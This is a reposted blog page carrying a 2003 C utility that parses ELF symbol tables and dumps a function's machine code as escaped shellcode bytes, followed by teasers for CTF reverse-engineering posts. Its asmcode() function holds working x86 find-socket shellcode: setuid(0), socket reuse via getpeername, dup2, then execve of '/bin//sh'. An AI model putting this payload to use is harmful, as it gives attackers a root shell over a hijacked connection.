readasm

最新推荐文章于 2024-05-21 23:15:42 发布
最新推荐文章于 2024-05-21 23:15:42 发布
阅读量146 收藏
点赞数
文章标签: FP F# .net

/* read elf string
* by bkbll(bkbll#cnhonker.net) 2003-08-08
* welcome to http://www.cnhonker.com
*/

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <error.h>
#include <elf.h>

#define VER "1.10"

typedef struct
{
char *info;
int leng;
int offset;
}syminfo;

void asmcode()
{
__asm__(
"
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x17,%al
int $0x80
xorl %eax,%eax
pushl %eax
incl %eax
pushl %eax
movl %esp,%ebx
xorl %ecx,%ecx
movb $0xa2,%al
int $0x80
movb $0xe0,%cl
movl %ecx,%eax
subl $0x0a,%eax
notl %eax
incl %eax
movl %eax,%edi
xorl %eax,%eax
incl %eax
decl %esp
movl %esp,%edx
pushl %eax
pushl %eax
pushl %edx
pushl %edi
pushl %ecx
leal 4(%esp),%ecx
xorl %ebx,%ebx
movb $0x0a,%bl
movb $0x66,%al
int $0x80
popl %ecx
cmpl $0x01,%eax
jne .+0x07
cmpb $0x49,(%edx)
je .+0xb
loop .-0x2c
xorl %eax,%eax
incl %eax
movl %eax,%ebx
int $0x80
movl %edi,%ebx
movb $0x03,%cl
movb $0x3f,%al
decl %ecx
int $0x80
incl %ecx
loop .-0x06
pushl %ecx
pushl $0x68732f6e
pushl $0x69622f2f
movl %esp,%ebx
pushl %ecx
pushl $0x706c692d
movl %esp,%edx
pushl %ecx
pushl %edx
pushl %ebx
movl %esp,%ecx
xorl %edx,%edx
xorl %eax,%eax
movb $0x0b,%al
int $0x80
"
);
}

void usage(char *s,int flag)
{
printf("Elf file reader & asm code read\n");
printf("by bkbll,bkbll@cnhonker.net(%s)\n",VER);
printf("------------------------------------\n");
if(flag==1)
{
printf("Usage:%s [-f <file>] [-x <address>] [-h]\n",s);
printf("Options:\n\t-f: the file want to read(defaut is self)\n");
printf("\t-x: the function address\n");
printf("\t-h: this screen\n");
printf("if nothing,it will show self's function table\n");
exit(0);
}
}

void ptelfhdr(Elf32_Ehdr *elfhdr)
{
//入口地址
printf("[+] Program Entry Addr:%p\n",elfhdr->e_entry);
//PHD表偏移量
//printf("[+] Program header table file offset:0x%x\n",elfhdr->e_phoff);/* Program header table file offset */
//SHD表偏移量
//printf("[+] Section header table file offset:0x%x\n",elfhdr->e_shoff);/* Section header table file offset */
//printf("[+] ELF header size in bytes:0x%x\n",elfhdr->e_ehsize);/* ELF header size in bytes */
//printf("[+] Program header table entry size:0x%x\n",elfhdr->e_phentsize);/* Program header table entry size */
//printf("[+] Program header table entry count:0x%x\n",elfhdr->e_phnum);/* Program header table entry count */
//printf("[+] Section header table entry size:0x%x\n",elfhdr->e_shentsize);/* Section header table entry size */
//printf("[+] Section header table entry count:0x%x\n",elfhdr->e_shnum);/* Section header table entry count */
//printf("[+] Section header string table index:0x%x\n",elfhdr->e_shstrndx);/* Section header string table index */
}

void ptelfshd(Elf32_Shdr* shdr)
{
//printf("[+] Section name (string tbl index):0x%x\n",shdr->sh_name); /* Section name (string tbl index) */
//printf("[+] Section type:0x%x\n",shdr->sh_type);/* Section type */
//printf("[+] Section flags:0x%x\n",shdr->sh_flags);/* Section flags */
//printf("[+] Section virtual addr at execution:0x%x\n",shdr->sh_addr);/* Section virtual addr at execution */
//printf("[+] Section file offset:0x%x\n",shdr->sh_offset);/* Section file offset */
//printf("[+] Section size in bytes:0x%x\n",shdr->sh_size);/* Section size in bytes */
//printf("[+] Link to another section:0x%x\n",shdr->sh_link);/* Link to another section */
//printf("[+] Additional section information:0x%x\n",shdr->sh_info);/* Additional section information */
//printf("[+] Section alignment:0x%x\n",shdr->sh_addralign);/* Section alignment */
//printf("[+] Entry size if section holds table:0x%x\n",shdr->sh_entsize);/* Entry size if section holds table */
}
int showmem(unsigned int p,int length)
{
int i=0,t,a,ptleng;
char *sc=(char *)p;
int next=16;
ptleng=(0xbffffffff-p)>length?length:(0xbffffffff-p);
ptleng++;
while(i<ptleng)
{
if(i%16==0)
{
printf("\r\n%p: ",sc+i);
}

next=((i+16)>ptleng)?ptleng:(i+16);
t=i;
for(;i<next;i++) printf("%.2x ",sc[i] & 0xff);
a=next-t;
for(;a<16;a++) printf(" ");
printf(" ");
while(t<next)
{
if((*(sc+t)<0x1f) || (*(sc+t)>0x7e))
printf(".",sc[t]);
else
printf("%c",sc[t]);
t++;
}
}
printf("\r\n");
return i;
}

void* readfile(FILE *fd,int offset,int size)
{
void *buf;

if(fd==NULL)
{
perror("[-] not a FILE pointer");
return NULL;
}
buf=malloc(size);
if(buf==NULL)
{
perror("[-] malloc failed");
return NULL;
}
memset(buf,0,size);
//定位
//printf("[@] before fseek,position:%#x\n",ftell(fd));
if(fseek(fd,offset,SEEK_SET)<0)
{
perror("[-] fseek failed");
free(buf);
return NULL;
}
//printf("[@] after fseek,position:%#x\n",ftell(fd));
if(fread(buf,1,size,fd)<0)
{
perror("[-] read failed");
free(buf);
return NULL;
}
return buf;
}
//get base address
unsigned int getbaseaddr(FILE *fd,Elf32_Ehdr *elfhdr)
{
unsigned int i,phdsize,phdnum,phdoffset,baseaddr;
char *buf;
Elf32_Phdr *tmp_phd;

phdoffset=elfhdr->e_phoff;
phdsize=elfhdr->e_phentsize;
phdnum=elfhdr->e_phnum;
for(i=0;i<phdnum;i++)
{
tmp_phd=(Elf32_Phdr *)readfile(fd,phdoffset+i*phdsize,sizeof(Elf32_Phdr));
if((tmp_phd->p_type) == PT_PHDR)
{
baseaddr=(tmp_phd->p_vaddr)-(tmp_phd->p_offset);
return baseaddr;
}
}
return 0;
}
//列举symbol
int list_sym(FILE *fd,Elf32_Shdr *sym_shdr,Elf32_Shdr *sym_str_shdr)
{
int i,a,num,stoff;
int symbol_offset,symbol_allsize,sym_str_offset,sym_str_size;
char *sym_str_table;
Elf32_Sym *symbol1;

if((sym_shdr == NULL ) || (sym_str_shdr == NULL))
{
printf("[-] Not a Shdr pointer\n");
return(-1);
}
symbol_offset=sym_shdr->sh_offset;
symbol_allsize=sym_shdr->sh_size;
sym_str_offset=sym_str_shdr->sh_offset;
sym_str_size=sym_str_shdr->sh_size;
//一共多少个symbol
num=symbol_allsize/sizeof(Elf32_Sym);
printf("[+] Found %d symbols\n",num);
if(num==0)
{
printf("[-] No symbol here\n");
return(-1);
}
printf("[@] Read 0x%x bytes from offset 0x%x\n",sym_str_size,sym_str_offset);
sym_str_table=(char *)readfile(fd,sym_str_offset,sym_str_size);
//showmem(sym_str_table,sym_str_size);
printf("[!] number address length type name \n");
for(i=0,a=1;i<num;i++)
{
symbol1=(Elf32_Sym *)readfile(fd,symbol_offset+i*sizeof(Elf32_Sym),sizeof(Elf32_Sym));
stoff=symbol1->st_name;
//只列举出function的symbol,不是重定位的函数,函数大小大于0的
if((stoff>0) && (ELF32_ST_TYPE(symbol1->st_info)==STT_FUNC) && (symbol1->st_shndx!=SHN_UNDEF) && (symbol1->st_size>0))
{
printf("[+] %3.d: 0x%.8x 0x%.4x FUNC %s\n",a,symbol1->st_value,symbol1->st_size,sym_str_table+stoff);
a++;
}
}
}
//查找symbol
syminfo *find_symbol_byaddr(FILE *fd,unsigned int addr,Elf32_Shdr *sym_shdr,Elf32_Shdr *sym_str_shdr,unsigned int baseaddr)
{
int i,a,num,staddr;
int symbol_offset,symbol_allsize,sym_str_offset,sym_str_size;
char *sym_str_table;
Elf32_Sym *symbol1;
syminfo *findout;

if((sym_shdr == NULL ) || (sym_str_shdr == NULL))
{
printf("[-] Not a Shdr pointer\n");
return(NULL);
}
symbol_offset=sym_shdr->sh_offset;
symbol_allsize=sym_shdr->sh_size;
sym_str_offset=sym_str_shdr->sh_offset;
sym_str_size=sym_str_shdr->sh_size;
//一共多少个symbol
num=symbol_allsize/sizeof(Elf32_Sym);
//printf("[+] Found %d symbols\n",num);
if(num==0)
{
printf("[-] No symbol here\n");
return(NULL);
}
//printf("[@] 从0x%x处读0x%x字节内容\n",sym_str_offset,sym_str_size);
sym_str_table=(char *)readfile(fd,sym_str_offset,sym_str_size);
//showmem(sym_str_table,sym_str_size);
//printf("[!] number address length name \n");
findout=(syminfo *)malloc(sizeof(syminfo));
for(i=0,a=1;i<num;i++)
{
symbol1=(Elf32_Sym *)readfile(fd,symbol_offset+i*sizeof(Elf32_Sym),sizeof(Elf32_Sym));
staddr=symbol1->st_value;
//printf("\n[@] st_name:%d,symbol name:%s",symbol1->st_name,sym_str_table+symbol1->st_name);
if((staddr==addr) && (symbol1->st_name>0))
{
findout->info=sym_str_table+symbol1->st_name;
findout->leng=symbol1->st_size;
findout->offset=addr-baseaddr;
return findout;
}
}
free(findout);
return NULL;
}

Elf32_Shdr *find_section_byname(FILE *fd,char *section_name,char *sstrtable,int s_offset,int snum,int ssize)
//文件名,查找的section名字,已经读出来的section string table,section入口地址,section有多少个,section多大
{
int i,name_off;
Elf32_Shdr *shdr1;

for(i=0;i<snum;i++)
{
shdr1=(Elf32_Shdr *)readfile(fd,s_offset+i*ssize,sizeof(*shdr1));
if(shdr1==NULL) continue;
name_off=shdr1->sh_name;
//printf("[@] Finding str:%s, current str:%s\n",section_name,sstrtable+name_off);
if(strcmp(section_name,sstrtable+name_off)==0)
{
return shdr1;
}
}
return NULL;
}

void prt_machine_code(FILE *fd,int offset,int length)
{
char *buffer;
int i,a;

buffer=(char *)malloc(length);
if(buffer==NULL)
{
printf("[-] malloc memory error");
return;
}
buffer=(char *)readfile(fd,offset,length);
printf("[+] machine code:\n\n");
printf("\"");
for(i=3,a=0;i<length-2;i++)
{
if((a%8==0) && (a/8>0)) printf("\"\n\"");
printf("\\x%.2x",buffer[i] & 0xff);
a++;
}
printf("\"\n");
}

char symtabstr[]=".symtab";
char strtabstr[]=".strtab";
char selfexe[]="/proc/self/exe";
main(int argc,char **argv)
{
Elf32_Ehdr *elfhdr;
Elf32_Shdr *shdr,*sym_shdr,*sym_str_shdr;
FILE *fp=NULL;
syminfo *find_out_sym;
int i,str_sec_offset; //section string table在第几个section中
int section_size,section_offset; //section开始位置,每个section大小
int num,section_strtable_length,section_strtable_offset;
unsigned int baseaddr;
char *section_strtable,*filename;
int address=0;
char c;

filename=selfexe;
while((c = getopt(argc, argv, "f:x:h"))!= EOF)
{
switch (c)
{
case 'f':
filename=optarg;
break;
case 'x':
sscanf(optarg,"%x",&address);
break;
case 'h':
usage(argv[0],1);
break;
default:
usage(argv[0],1);
return 0;
}
}
/*
if(argc<2)
{
printf("Usage:%s <file> <addr>\n",argv[0]);
exit(0);
}
*/

//if(argc>1) filename=argv[1];
//if(argc>2) sscanf(argv[2],"%x",&address);
usage("",0);
printf("[+] Reading file %s\n",filename);
fp=fopen(filename,"r");
if(fp==NULL)
{
perror("[-] open file error");
exit(0);
}
elfhdr=(Elf32_Ehdr *)readfile(fp,0,sizeof(*elfhdr));
if(elfhdr==NULL) exit(0);
ptelfhdr(elfhdr);
baseaddr=getbaseaddr(fp,elfhdr);
if(baseaddr==0)
{
printf("[-] Canot get base address\n");
exit(0);
}
printf("[+] Found base address:%p\n",baseaddr);
str_sec_offset=elfhdr->e_shstrndx; //SHD str table在section中的位置
section_size=elfhdr->e_shentsize; //每个section的大小
section_offset=elfhdr->e_shoff; //section入口地址
num=elfhdr->e_shnum; //一共多少个section
//if(offset>0) str_sec_offset=offset;
if(str_sec_offset>=num)
{
printf("[-] TOO large offset\n");
fclose(fp);
exit(0);
}
//读第str_sec_offset个section
shdr=(Elf32_Shdr *)readfile(fp,section_offset+str_sec_offset*section_size,section_size);
//printf("[*] Section %d:\n",str_sec_offset);
//sh_offset,sh_size
ptelfshd(shdr);

section_strtable_length=shdr->sh_size; //section string table长度
section_strtable_offset=shdr->sh_offset; //section string table偏移量
printf("[@] Read 0x%x bytes from offset 0x%x \n",section_strtable_length,section_strtable_offset);
section_strtable=(char *)readfile(fp,section_strtable_offset,section_strtable_length);
printf("[?] finding section %s......",symtabstr);
fflush(stdout);
sym_shdr=find_section_byname(fp,symtabstr,section_strtable,section_offset,num,section_size);
if(sym_shdr==NULL)
{
printf("FAILED\n");
fclose(fp);
exit(0);
}
else
{
printf("Got it\n");
ptelfshd(sym_shdr);
}
printf("[?] finding section %s......",strtabstr);
fflush(stdout);
sym_str_shdr=find_section_byname(fp,strtabstr,section_strtable,section_offset,num,section_size);
if(sym_str_shdr==NULL) printf("FAILED\n");
else
{
printf("Got it\n");
ptelfshd(sym_str_shdr);
}
if(address==0)
{
list_sym(fp,sym_shdr,sym_str_shdr);
}
else
{
printf("[?] finding sym-addr:%p......",address);
fflush(stdout);
find_out_sym=find_symbol_byaddr(fp,address,sym_shdr,sym_str_shdr,baseaddr);
if(find_out_sym==NULL)
{
printf("FAILED\n");
}
else
{
printf("Got it\n");
printf("[+] Symbol name:%s\n",find_out_sym->info);
printf("[+] Symbol offset:0x%x\n",find_out_sym->offset);
printf("[+] Symbol leng:0x%x\n",find_out_sym->leng);
//get the asm code
if(find_out_sym->leng>0)
prt_machine_code(fp,find_out_sym->offset,find_out_sym->leng);
else
printf("[-] Symbol length==0\n");
}
}
fclose(fp);
exit(1);
}

iteye_3619
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
南邮 逆向 ReadAsm2 wp
分不清东西南北的Laffey
09-16 763
题目下载链接2.asm 题目:读汇编是逆向基本功。    给出的文件是func函数的汇编    main函数如下    输出的结果即为flag,格式为flag{****},请连flag{}一起提交    编译环境为linux gcc x86-64    调用约定为System V AMD64 ABI    请不要利用汇编器,IDA等工具。。这里考的就是读汇编与推算汇编结果的能力 ...
一道逆向CTF题-read asm详解
sherlly666的博客
10-30 3810
题目给出一段c程序:int main(int argc, char const *argv[]) { char input[] = {0x0, 0x67, 0x6e, 0x62, 0x63, 0x7e, 0x74, 0x62, 0x69, 0x6d, 0x55, 0x6a, 0x7f, 0x60, 0x51, 0x66, 0x63, 0x4e, 0x66, 0x7b, 0x71, 0x4a, 0x7
入门向:南邮CTF_ReadAsm2_WP
03-13 358
题目链接:http://ctf.nuptzj.cn/challenges#ReadAsm2 我比较菜,所以把思路全部敲上来了。 题目很明确告诉我们,这道题考察阅读汇编代码的能力。 在对编译环境和调用约定进行说明之后,只有一个文件和一段C语言代码: int main(int argc, char const *argv[]) { char inpu...
ReadAsm2
weixin_30530523的博客
04-08 230
首先查看题目 下载文档之后用虚拟机打开(我用的是Kali Linux) 推测应该是对这个func函数反汇编结果应该就出来了 用c写一下算出结果 #include<bits/stdc++.h> using namespace std; void func(char* input,int num) { int i; for(i=1;i&lt...
南邮CTF逆向题第二道ReadAsm2解题思路
iqiqiya的博客
12-23 2626
首先看下提示   分析main函数 可以发现主要功能还是在于func函数中 于是我们仔细看func函数 00000000004004e6&lt;func&gt;:;4004e6一列表示该指令对应的虚拟内存地址 55一列为该指令对应的计算机指令 4004e6:55push rbp ;入栈,将寄存器的值压入调用 bp栈中 4004e7:4889 e5 mov rbp,rsp;建立新栈...
Oracle asm 性能监控工具
04-16
oracle asm存储的监控脚本,非常实用,类似于linux iostat 使用。 Output: DiskPath - Path to ASM disk DiskName - ASM disk name Gr - ASM disk group number Dsk - ASM disk number Reads - Reads Writes...
51read_red_sign.rar_单片机开发_Asm_
08-12
51扩展红外键盘
new.rar_汇编语言_Asm_
08-11
displaying hexazecimal code of the characters read from the keyboard
ARM assembler.zip_Asm_arm_arm code
09-23
examples of how to read arm asm code
oracle asm rac
01-11
mount: block device /dev/hdc is write-protected, mounting read-only [root@node1 yum.repos.d]# cd /mnt/ [root@node1 mnt]# ls Server ClusterStorage -ld dr-xr-xr-x 3 root root 8192 2010-03-22 Cluster...
路由器逆向分析------QEMU的下载和安装(Linux平台)
Fly20141201. 的专栏
04-04 5160
一、QEMU源码的下载和编译 QEMU源码的github下载地址:https://github.com/qemu/qemu。 QEMU源码的官方网站下载地址:http://www.qemu-project.org/download/。 QEMU的官方参考的博客的地址:http://www.qemu-project.org/blog/。 QEMU的用户帮助文档的参考地址:https://qe
“Additional information: 您必须有许可证才能使用此 ActiveX 控件”的错误解决方法
热门推荐
XP_lmq的专栏
05-08 1万+
昨天把项目的ArcGIS从9.3升级为10.1。早上到公司,准备提交工程代码,编译通过,但运行报错。错误信息:              原本以为是自己清理中间文件导致的,但是找来找去,没有任何结果。最后搜索到由于ArcGIS的控件License没有权限。最后想到ArcGIS License Server Administrator的许可服务没有启动。
android 打印内存地址,获取android bin、so文件符号偏移或者内存地址
weixin_35839384的博客
05-26 655
代码直接晒代码external.h/** external.h** Created on: 2016年12月7日* Author: lyz*/#ifndef BASE_ELF_READER_EXTERNAL_H_#define BASE_ELF_READER_EXTERNAL_H_/* ELF support for BFD.Copyright 1991, 1992, 1993, 19...
实模式汇编代码header.S——头变量hdr
云(存储),松(耦合)
12-31 3282
3.2.2初始化头变量hdr<br />在讲解“中世纪时代”的代码之前,先详细介绍一个在初始化当中非常重要的内容,hdr,全称叫做“setup_header”。这个头变量存放着所有初始化期间使用到的数据,在编译setup.bin的时候存放在.header段中,其代码我们看,从arch/x86/boot/header.S的第96行开始:<br /> <br />  94        .section ".header", "a"<br />  95        .globl  hdr<br />  96h
数据库(vb.net+OleDB+Access)简易学生信息管理系统
weixin_56050945的博客
05-18 382
在我们日常生活当中,数据库一词往往离不开我们的编程界,在学校、仓库等方面起着存储数据及数据关系作用的文件。相较于Excel,Access可以存储无限多的记录,内容也十分丰富,例如文本、数字、日期、T&F等。而且不需要额外的转换数据即可被.net读取使用),好了开始我们今天的教学。如题,我们需要完成几项工作。
.NET技术成长路线架构图
A_nanda的博客
05-21 276
请注意,这个架构图是一个概览,并且每个技术领域都有更深入的细节和子领域。在实际的成长过程中,开发者可以根据自己的兴趣和项目需求来选择深入学习的领域。
如何使用DotNet-MetaData识别.NET恶意软件源码文件元数据
FreeBuf_的博客
05-21 773
DotNetMetadata.py脚本可以从.NET源代码文件中提取GUID、MVID、YTPELIB和程序集名称等信息,该脚本支持在Windows和Linux操作系统上运行,按理来说macOS也应该没有问题。DotNet-MetaData是一款针对.NET恶意软件的安全分析工具,该工具专为蓝队研究人员设计,可以帮助广大研究人员轻松识别.NET恶意软件二进制源代码文件中的元数据。项目提供的“sample rules”目录中包含了相关的检测样本规则,你可以根据自己的需求跟新和修改规则。】获取最新的发布版本。
C#面:用.NET做B/S结构的系统,是用几层结构来开发,每一层之间的关系以及为什么要这样分层
那个那个鱼的博客
05-21 210
一般为3层: 表示层,业务逻辑层,数据层。
闲话 .NET(3):.NET Framework 的缺点
最新发布
yangshuquan的专栏
05-21 545
2016 年,微软正式推出 .NET Core 1.0,并在 2019 年全面停止 .NET Framework 的更新。.NET Core 并不是 .NET Framework 的升级版,而是一个从头开始开发的全新平台,一个跟 .NET Framework 截然不同的开源技术框架。微软为什么要这么做呢?今天我们来聊聊 .NET Framework 有什么缺点,导致微软做出如此艰难的决定。
TypeError: Cannot read properties of undefined (reading 'apply')at mainThreadEM ASM
11-08
这个错误通常是由于尝试在未定义的对象上调用方法或属性而引起的。在你的引用中,错误信息是在调用一个未定义的对象上的apply方法时出现的。这可能是由于对象未正确初始化或未正确传递参数导致的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值